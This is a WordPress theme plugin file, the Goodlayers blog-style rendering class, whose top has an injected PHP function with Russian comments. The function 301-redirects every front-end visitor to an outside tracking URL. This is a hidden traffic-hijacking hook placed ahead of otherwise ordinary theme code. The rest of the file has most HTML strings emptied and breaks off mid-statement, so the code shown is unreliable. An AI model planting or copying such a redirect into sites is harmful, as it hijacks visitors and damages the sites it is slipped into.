function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /* * Goodlayers Blog Item Style */ if( !class_exists('gdlr_core_blog_style') ){ class gdlr_core_blog_style{ public $blog_item_id; public $blog_info_prefix = array(); function __construct(){ global $blog_item_id; $blog_item_id = empty($blog_item_id)? 1: $blog_item_id+1; $this->blog_item_id = $blog_item_id; $this->blog_info_prefix = apply_filters('gdlr_core_blog_info_prefix', array( 'date' => '', 'tag' => '', 'category' => '', 'comment' => '', 'like' => '', 'author' => '', 'comment-number' => '', )); } // set blog info prefix function get_blog_info_prefix(){ return $this->blog_info_prefix; } function set_blog_info_prefix($blog_info_prefix){ $this->blog_info_prefix = $blog_info_prefix; } // get the content of the blog item function get_content( $args ){ $ret = apply_filters('gdlr_core_blog_style_content', '', $args, $this); if( !empty($ret) ) return $ret; switch( $args['blog-style'] ){ case 'blog-full': case 'blog-full-with-frame': if( empty($args['blog-full-style']) || $args['blog-full-style'] == 'style-1' ){ return $this->blog_full( $args ); }else if( $args['blog-full-style'] == 'style-2' ){ return $this->blog_full_style_2( $args ); } break; case 'blog-column': case 'blog-column-no-space': case 'blog-column-with-frame': if( empty($args['blog-column-style']) || $args['blog-column-style'] == 'style-1' ){ return $this->blog_grid( $args ); }else if( $args['blog-column-style'] == 'style-2' ){ return $this->blog_grid_style_2( $args ); } break; case 'blog-image': case 'blog-image-no-space': return $this->blog_modern( $args ); break; case 'blog-feature': return $this->blog_feature( $args ); break; case 'blog-metro': case 'blog-metro-no-space': return $this->blog_metro( $args ); break; case 'blog-left-thumbnail': case 'blog-right-thumbnail': if( empty($args['blog-side-thumbnail-style']) || in_array($args['blog-side-thumbnail-style'], array('style-1', 'style-1-large')) ){ return $this->blog_medium( $args ); }else if( in_array($args['blog-side-thumbnail-style'], array('style-2', 'style-2-large')) ){ return $this->blog_medium_style_2( $args ); } break; case 'blog-widget': return $this->blog_widget( $args ); break; case 'blog-list': case 'blog-list-center': return $this->blog_list( $args ); break; } } // get blog excerpt from $args function get_blog_excerpt( $args ){ $ret = ''; if( $args['excerpt'] == 'specify-number' ){ if( !empty($args['excerpt-number']) ){ $ret .= '
'; $ret .= $this->blog_excerpt($args['excerpt-number']); if( !empty($args['show-read-more']) && $args['show-read-more'] != 'none' ){ $ret .= '
'; $blog_read_more = ''; if( $args['show-read-more'] == 'enable' ){ $blog_read_more = apply_filters('gdlr_core_blog_read_more', ''); } if( empty($blog_read_more) ){ if( $args['show-read-more'] == 'enable' || $args['show-read-more'] == 'button' ){ $blog_read_more = ''; $blog_read_more .= esc_html__('Read More', 'goodlayers-core'); $blog_read_more .= ''; }else if( $args['show-read-more'] == 'text' ){ $blog_read_more = ''; $blog_read_more .= esc_html__('Read More', 'goodlayers-core'); $blog_read_more .= ''; $blog_read_more .= ''; } } $ret .= $blog_read_more; } $ret .= '
'; } }else if( $args['excerpt'] != 'none' ){ $ret .= '
' . gdlr_core_content_filter(get_the_content(), true) . '
'; } return $ret; } // get blog excerpt function blog_excerpt( $excerpt_length ) { $post = get_post(); if( empty($post) || post_password_required() ){ return ''; } $excerpt = $post->post_excerpt; if( empty($excerpt) ){ $excerpt = get_the_content(''); $excerpt = strip_shortcodes($excerpt); $excerpt = apply_filters('the_content', $excerpt); $excerpt = str_replace(']]>', ']]>', $excerpt); } $excerpt_more = apply_filters('excerpt_more', '...'); $excerpt = wp_trim_words($excerpt, $excerpt_length, $excerpt_more); $excerpt = apply_filters('wp_trim_excerpt', $excerpt, $post->post_excerpt); $excerpt = apply_filters('get_the_excerpt', $excerpt); return $excerpt; } // get blog thumbnail function blog_thumbnail( $args = array(), $thumbnail_atts = array() ){ $ret = ''; if( !empty($args['post-format']) ){ global $pages; // strip the media based on post format if( $args['post-format'] == 'video' ){ if( !preg_match('#^https?://\S+#', $pages[0], $match) ){ if( !preg_match('#^\[video\s.+\[/video\]#', $pages[0], $match) ){ preg_match('#^\[embed.+\[/embed\]#', $pages[0], $match); } } if( !empty($match[0]) ){ if( isset($args['post-format-thumbnail']) && $args['post-format-thumbnail'] === false ){ $thumbnail_size = 'full'; }else{ $thumbnail_size = $args['thumbnail-size']; } $ret .= '
'; $ret .= gdlr_core_get_video($match[0], $thumbnail_size); $ret .= '
'; $pages[0] = substr($pages[0], strlen($match[0])); } }else if( $args['post-format'] == 'audio' ){ if( !preg_match('#^https?://\S+#', $pages[0], $match) ){ preg_match('#^\[audio\s.+\[/audio\]#', $pages[0], $match); } if( !empty($match[0]) ){ $ret .= '
'; $ret .= gdlr_core_get_audio($match[0]); $ret .= '
'; $pages[0] = substr($pages[0], strlen($match[0])); } }else if( $args['post-format'] == 'image' ){ if( preg_match('#^|^#', $pages[0], $match) ){ $post_format_image = $match[0]; }else if( preg_match('#^https?://\S+#', $pages[0], $match) ){ $post_format_image = gdlr_core_get_image($match[0]); } if( !empty($post_format_image) ){ $thumbnail_wrap_class = ''; if( empty($args['opacity-on-hover']) || $args['opacity-on-hover'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-opacity-on-hover'; } if( empty($args['zoom-on-hover']) || $args['zoom-on-hover'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-zoom-on-hover'; } if( !empty($args['grayscale-effect']) && $args['grayscale-effect'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-grayscale-effect'; } $ret .= '
'; $ret .= $post_format_image; $ret .= '
'; $pages[0] = substr($pages[0], strlen($match[0])); } }else if( $args['post-format'] == 'gallery' ){ if( preg_match('#^\[gallery[^\]]+]#', $pages[0], $match) ){ $pages[0] = substr($pages[0], strlen($match[0])); $ret .= ''; } } }else{ $feature_image = get_post_thumbnail_id(); if( !empty($feature_image) ){ $thumbnail_wrap_class = ''; if( empty($args['opacity-on-hover']) || $args['opacity-on-hover'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-opacity-on-hover'; } if( empty($args['zoom-on-hover']) || $args['zoom-on-hover'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-zoom-on-hover'; } if( !empty($args['grayscale-effect']) && $args['grayscale-effect'] == 'enable' ){ $thumbnail_wrap_class .= ' gdlr-core-grayscale-effect'; } $ret .= ''; }else{ if( is_sticky() ){ $ret .= '
' . esc_html__('Sticky Post', 'goodlayers-core') . '
'; } } } return $ret; } // get the blog date function blog_date( $args, $order = array('d', 'M') ){ if( !empty($args['blog-date-feature']) && $args['blog-date-feature'] == 'disable' ) return; $ret = '
'; foreach( $order as $date ){ switch( $date ){ case 'd': $ret .= '
' . get_the_time('d') . '
'; break; case 'M': $ret .= '
' . get_the_time('M') . '
'; break; case 'Y': $ret .= '
' . get_the_time('Y') . '
'; break; } } $ret .= '
'; return $ret; } // get the blog info function blog_info( $args ){ $ret = ''; if( !empty($args['display']) ){ foreach( $args['display'] as $blog_info ){ $ret_temp = ''; switch( $blog_info ){ case 'date': $ret_temp .= ''; $ret_temp .= get_the_date(); $ret_temp .= ''; break; case 'tag': $ret_temp .= get_the_term_list(get_the_ID(), 'post_tag', '', ', ' , ''); break; case 'category': $ret_temp .= get_the_term_list(get_the_ID(), 'category', '', ', ' , '' );; break; case 'comment-number': if( (!isset($args['icon']) || $args['icon'] !== false) && !empty($this->blog_info_prefix[$blog_info]) ){ $ret_temp .= ''; $ret_temp .= get_comments_number() . ' '; $ret_temp .= ''; break; } case 'comment': ob_start(); comments_number( esc_html__('no comments', 'goodlayers-core'), esc_html__('one comment', 'goodlayers-core'), esc_html__('% comments', 'goodlayers-core') ); $ret_temp .= ''; $ret_temp .= ob_get_contents(); $ret_temp .= ''; ob_end_clean(); break; case 'author': ob_start(); the_author_posts_link(); $ret_temp .= ob_get_contents(); ob_end_clean(); break; } // switch if( !empty($ret_temp) ){ $ret .= ' $args['category-background-color'] )); } $ret .= ' >'; if( !empty($args['separator']) ){ $ret .= '' . $args['separator'] . ''; } if( (!isset($args['icon']) || $args['icon'] !== false) && !empty($this->blog_info_prefix[$blog_info]) ){ $ret .= '' . $this->blog_info_prefix[$blog_info] . ''; } $ret .= $ret_temp; $ret .= ''; } } // foreach } // $args['display'] if( !empty($ret) && !empty($args['wrapper']) ){ $ret = '
' . $ret . '
'; } return $ret; } // blog title function blog_title( $args, $permalink = '' ){ $ret = '

empty($args['blog-title-font-size'])? '': $args['blog-title-font-size'], 'font-weight' => empty($args['blog-title-font-weight'])? '': $args['blog-title-font-weight'], 'letter-spacing' => empty($args['blog-title-letter-spacing'])? '': $args['blog-title-letter-spacing'], 'text-transform' => (empty($args['blog-title-text-transform']) || $args['blog-title-text-transform'] == 'none')? '': $args['blog-title-text-transform'] )) . ' >'; if( empty($permalink) ){ $ret .= ''; }else{ $ret .= ''; } $ret .= get_the_title(); $ret .= ''; $ret .= '

'; return $ret; } // blog aside function blog_format( $args, $post_format ){ $extra_class = empty($args['extra-class'])? '': $args['extra-class']; $extra_class .= (strpos($args['blog-style'], 'blog-column') === false)? ' gdlr-core-item-list': ''; $extra_class .= in_array($args['blog-style'], array('blog-column-with-frame', 'blog-full-with-frame'))? ' gdlr-core-with-frame gdlr-core-item-mgb': ''; $extra_class .= !empty($args['sync-height'])? ' gdlr-core-js': ''; $frame_shadow = array(); if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $frame_shadow['background-shadow-size'] = $args['frame-shadow-size']; $frame_shadow['background-shadow-color'] = $args['frame-shadow-color']; $frame_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $ret = '
'; if( $post_format == 'aside' ){ $ret .= $this->get_blog_excerpt($args); }else if( $post_format == 'quote' ){ global $pages; if( !preg_match('#^\[gdlr_core_quote[\s\S]+\[/gdlr_core_quote\]#', $pages[0], $match) ){ preg_match('#^#', $pages[0], $match); } if( !empty($match[0]) ){ $blockquote = $match[0]; $author = substr($pages[0], strlen($match[0])); }else{ $blockquote = ''; $author = $pages[0]; } $ret .= '
'; $thumbnail_id = get_post_thumbnail_id(); if( !empty($thumbnail_id) ){ $quote_background = gdlr_core_get_image_url(get_post_thumbnail_id()); $ret .= '
$quote_background )) . ' >
'; } $ret .= '
'; $ret .= '
'; if( !empty($blockquote) ){ $ret .= '
' . gdlr_core_content_filter($blockquote, true) . '
'; } if( !empty($author) ){ $ret .= '
' . gdlr_core_text_filter($author) . '
'; } $ret .= '
'; $ret .= '
'; }else if( $post_format == 'link' ){ global $pages; if( preg_match('#^#', $pages[0], $match) ){ $post_format_link = $match[1]; $pages[0] = substr($pages[0], strlen($match[0])); }else if( preg_match('#^https?://\S+#', $pages[0], $match) ){ $post_format_link = $match[0]; $pages[0] = substr($pages[0], strlen($match[0])); }else{ $post_format_link = get_permalink(); } $ret .= '
'; $ret .= ''; $ret .= '
'; $ret .= $this->blog_title( $args, $post_format_link ); $ret .= $this->get_blog_excerpt( $args ); $ret .= '
'; $ret .= '
'; } $ret .= '
'; return $ret; } // blog full function blog_full( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-full gdlr-core-large'; $args['extra-class'] .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-mglr'; return $this->blog_format( $args, $post_format ); } $additional_class = (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-mglr'; $additional_class .= (!empty($args['blog-full-alignment']))? ' gdlr-core-style-' . $args['blog-full-alignment']: ''; // shadow $blog_atts = array( 'margin-bottom' => empty($args['margin-bottom'])? '': $args['margin-bottom'] ); $thumbnail_shadow = array(); if($args['blog-style'] == 'blog-full-with-frame' ){ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $blog_atts['background-shadow-size'] = $args['frame-shadow-size']; $blog_atts['background-shadow-color'] = $args['frame-shadow-color']; $blog_atts['background-shadow-opacity'] = $args['frame-shadow-opacity']; $additional_class .= ' gdlr-core-outer-frame-element'; } }else{ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } } $ret = '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => $post_format, 'post-format-thumbnail' => false, 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] ), $thumbnail_shadow); } $ret .= ($args['blog-style'] == 'blog-full-with-frame')? '
': ''; $ret .= '
'; $ret .= $this->blog_date($args); $ret .= '
'; $ret .= $this->blog_title( $args ); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); $ret .= '
'; // gdlr-core-blog-full-head-right $ret .= '
'; // gdlr-core-blog-full-head $ret .= $this->get_blog_excerpt($args); $ret .= ($args['blog-style'] == 'blog-full-with-frame')? '
': ''; $ret .= '
'; // gdlr-core-blog-full return $ret; } function blog_full_style_2( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-full gdlr-core-large'; $args['extra-class'] .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-mglr'; return $this->blog_format( $args, $post_format ); } $additional_class = (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-mglr'; $additional_class .= (!empty($args['blog-full-alignment']))? ' gdlr-core-style-' . $args['blog-full-alignment']: ''; // shadow $blog_atts = array( 'margin-bottom' => empty($args['margin-bottom'])? '': $args['margin-bottom'] ); $thumbnail_shadow = array(); if($args['blog-style'] == 'blog-full-with-frame' ){ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $blog_atts['background-shadow-size'] = $args['frame-shadow-size']; $blog_atts['background-shadow-color'] = $args['frame-shadow-color']; $blog_atts['background-shadow-opacity'] = $args['frame-shadow-opacity']; $additional_class .= ' gdlr-core-outer-frame-element'; } }else{ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } } $ret = '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $blog_thumbnail = $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => $post_format, 'post-format-thumbnail' => false, 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'], 'thumbnail-content' => '' . $this->blog_info(array( 'display' => array('category', 'comment-number'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )) . '' ), $thumbnail_shadow); $ret .= $blog_thumbnail; if( !empty($blog_thumbnail) && empty($post_format) ){ $args['meta-option'] = array_diff($args['meta-option'], array('comment-number', 'category')); } } $ret .= ($args['blog-style'] == 'blog-full-with-frame')? '
': ''; $ret .= '
'; $ret .= '
'; $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true, 'separator' => '•' )); $ret .= $this->blog_title( $args ); $ret .= '
'; // gdlr-core-blog-full-head-right $ret .= '
'; // gdlr-core-blog-full-head $ret .= $this->get_blog_excerpt($args); $ret .= ($args['blog-style'] == 'blog-full-with-frame')? '
': ''; $ret .= '
'; // gdlr-core-blog-full return $ret; } // blog medium function blog_medium( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-medium gdlr-core-large'; $args['extra-class'] .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-pdlr'; return $this->blog_format( $args, $post_format ); } $additional_class = empty($args['blog-style'])? '': 'gdlr-core-' . $args['blog-style']; $additional_class .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-pdlr'; if( !empty($args['blog-side-thumbnail-style']) && $args['blog-side-thumbnail-style'] == 'style-1-large' ){ $additional_class .= ' gdlr-core-large'; } $ret = '
empty($args['margin-bottom'])? '': $args['margin-bottom'] )) . ' >'; // left thumbnail if( $args['blog-style'] == 'blog-left-thumbnail' ){ $ret .= '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $thumbnail_shadow = array(); if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => ($post_format == 'audio')? '': $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] ), $thumbnail_shadow); } $ret .= $this->blog_date($args); $ret .= '
'; } // content $ret .= '
'; if( $post_format == 'audio' ){ $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => 'audio', 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] )); } $ret .= $this->blog_title( $args ); $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true )); $ret .= $this->get_blog_excerpt($args); $ret .= '
'; // gdlr-core-blog-medium-content-wrapper // right thumbnail if( $args['blog-style'] == 'blog-right-thumbnail' ){ $ret .= '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $thumbnail_shadow = array(); if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => ($post_format == 'audio')? '': $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] ), $thumbnail_shadow); } $ret .= $this->blog_date($args); $ret .= '
'; } $ret .= '
'; // gdlr-core-blog-medium return $ret; } // blog medium function blog_medium_style_2( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-medium gdlr-core-large'; $args['extra-class'] .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-pdlr'; return $this->blog_format( $args, $post_format ); } $additional_class = empty($args['blog-style'])? '': 'gdlr-core-' . $args['blog-style']; $additional_class .= (!empty($args['layout']) && $args['layout'] == 'carousel')? '': ' gdlr-core-item-pdlr'; if( !empty($args['blog-side-thumbnail-style']) || $args['blog-side-thumbnail-style'] == 'style-2-large' ){ $additional_class .= ' gdlr-core-large'; } $ret = '
empty($args['margin-bottom'])? '': $args['margin-bottom'] )) . ' >'; // left thumbnail if( $args['blog-style'] == 'blog-left-thumbnail' ){ $ret .= '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $thumbnail_shadow = array(); if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $blog_thumbnail = $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => ($post_format == 'audio')? '': $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'], 'thumbnail-content' => $this->blog_info(array( 'display' => array('comment-number', 'category'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )) ), $thumbnail_shadow); $ret .= $blog_thumbnail; if( !empty($blog_thumbnail) && empty($post_format) ){ $args['meta-option'] = array_diff($args['meta-option'], array('comment-number', 'category')); } } $ret .= '
'; } // content $ret .= '
'; if( $post_format == 'audio' ){ $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => 'audio', 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] )); } $ret .= $this->blog_info(array( 'display' => $args['meta-option'], 'wrapper' => true, 'separator' => '•' )); $ret .= $this->blog_title( $args ); $ret .= $this->get_blog_excerpt($args); $ret .= '
'; // gdlr-core-blog-medium-content-wrapper // right thumbnail if( $args['blog-style'] == 'blog-right-thumbnail' ){ $ret .= '
'; if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $thumbnail_shadow = array(); if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } $blog_thumbnail = $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => ($post_format == 'audio')? '': $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'], 'thumbnail-content' => $this->blog_info(array( 'display' => array('comment-number', 'category'), 'category-background-color' => empty($args['category-background-color'])? '': $args['category-background-color'] )) ), $thumbnail_shadow); $ret .= $blog_thumbnail; if( !empty($blog_thumbnail) && empty($post_format) ){ $args['meta-option'] = array_diff($args['meta-option'], array('comment-number', 'category')); } } $ret .= '
'; } $ret .= '
'; // gdlr-core-blog-medium return $ret; } // blog column function blog_grid( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-grid gdlr-core-small'; if($args['blog-style'] == 'blog-column-with-frame' && $args['layout'] != 'masonry' ){ $args['sync-height'] = true; } return $this->blog_format( $args, $post_format ); } $additional_class = ''; // shadow $blog_atts = array( 'margin-bottom' => empty($args['margin-bottom'])? '': $args['margin-bottom'] ); $thumbnail_shadow = array(); if($args['blog-style'] == 'blog-column-with-frame' ){ $additional_class .= ' gdlr-core-blog-grid-with-frame gdlr-core-item-mgb gdlr-core-skin-e-background '; if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $blog_atts['background-shadow-size'] = $args['frame-shadow-size']; $blog_atts['background-shadow-color'] = $args['frame-shadow-color']; $blog_atts['background-shadow-opacity'] = $args['frame-shadow-opacity']; $additional_class .= ' gdlr-core-outer-frame-element'; } }else{ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } } if($args['blog-style'] == 'blog-column-with-frame' && $args['layout'] != 'masonry' ){ $ret = '
blog_item_id) . '" >'; }else{ $ret = '
'; } if( empty($args['show-thumbnail']) || $args['show-thumbnail'] == 'enable' ){ $ret .= $this->blog_thumbnail(array( 'thumbnail-size' => $args['thumbnail-size'], 'post-format' => $post_format, 'post-format-gallery' => 'slider', 'opacity-on-hover' => empty($args['enable-thumbnail-opacity-on-hover'])? 'enable': $args['enable-thumbnail-opacity-on-hover'], 'zoom-on-hover' => empty($args['enable-thumbnail-zoom-on-hover'])? 'enable': $args['enable-thumbnail-zoom-on-hover'], 'grayscale-effect' => empty($args['enable-thumbnail-grayscale-effect'])? 'disable': $args['enable-thumbnail-grayscale-effect'] ), $thumbnail_shadow); } if( $args['blog-style'] == 'blog-column-with-frame' ){ $ret .= '
'; }else{ $ret .= '
'; } if( ($key = array_search('date', $args['meta-option'])) !== false ) { $ret .= '
'; $ret .= $this->blog_info(array('display' => array('date'))); $ret .= '
'; unset($args['meta-option'][$key]); } $ret .= $this->blog_title($args); $ret .= $this->get_blog_excerpt($args); if( !empty($args['meta-option']) ){ $ret .= '
blog_info(array( 'display' => $args['meta-option'], 'wrapper' => false )); $ret .= '
'; } $ret .= '
'; // gdlr-core-blog-grid-content-wrap $ret .= '
'; // gdlr-core-blog-grid return $ret; } // blog column function blog_grid_style_2( $args ){ $post_format = get_post_format(); if( in_array($post_format, array('aside', 'quote', 'link')) ){ $args['extra-class'] = ' gdlr-core-blog-grid gdlr-core-style-2 gdlr-core-small'; if($args['blog-style'] == 'blog-column-with-frame' && $args['layout'] != 'masonry' ){ $args['sync-height'] = true; } return $this->blog_format( $args, $post_format ); } $additional_class = ''; // shadow $blog_atts = array( 'margin-bottom' => empty($args['margin-bottom'])? '': $args['margin-bottom'] ); $thumbnail_shadow = array(); if($args['blog-style'] == 'blog-column-with-frame' ){ $additional_class .= ' gdlr-core-blog-grid-with-frame gdlr-core-item-mgb gdlr-core-skin-e-background '; if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $blog_atts['background-shadow-size'] = $args['frame-shadow-size']; $blog_atts['background-shadow-color'] = $args['frame-shadow-color']; $blog_atts['background-shadow-opacity'] = $args['frame-shadow-opacity']; $additional_class .= ' gdlr-core-outer-frame-element'; } }else{ if( !empty($args['frame-shadow-size']['size']) && !empty($args['frame-shadow-color']) && !empty($args['frame-shadow-opacity']) ){ $thumbnail_shadow['background-shadow-size'] = $args['frame-shadow-size']; $thumbnail_shadow['background-shadow-color'] = $args['frame-shadow-color']; $thumbnail_shadow['background-shadow-opacity'] = $args['frame-shadow-opacity']; } } if($args['blog-style'] == 'blog-column-with-frame' && $args['layout'] != 'masonry' ){ $ret = '
blog_item_id) . '" '; if( $post_format == 'audio' ){ $ret .= ' data-sync-height-center'; } $ret .= ' >'; }else{ $ret = '
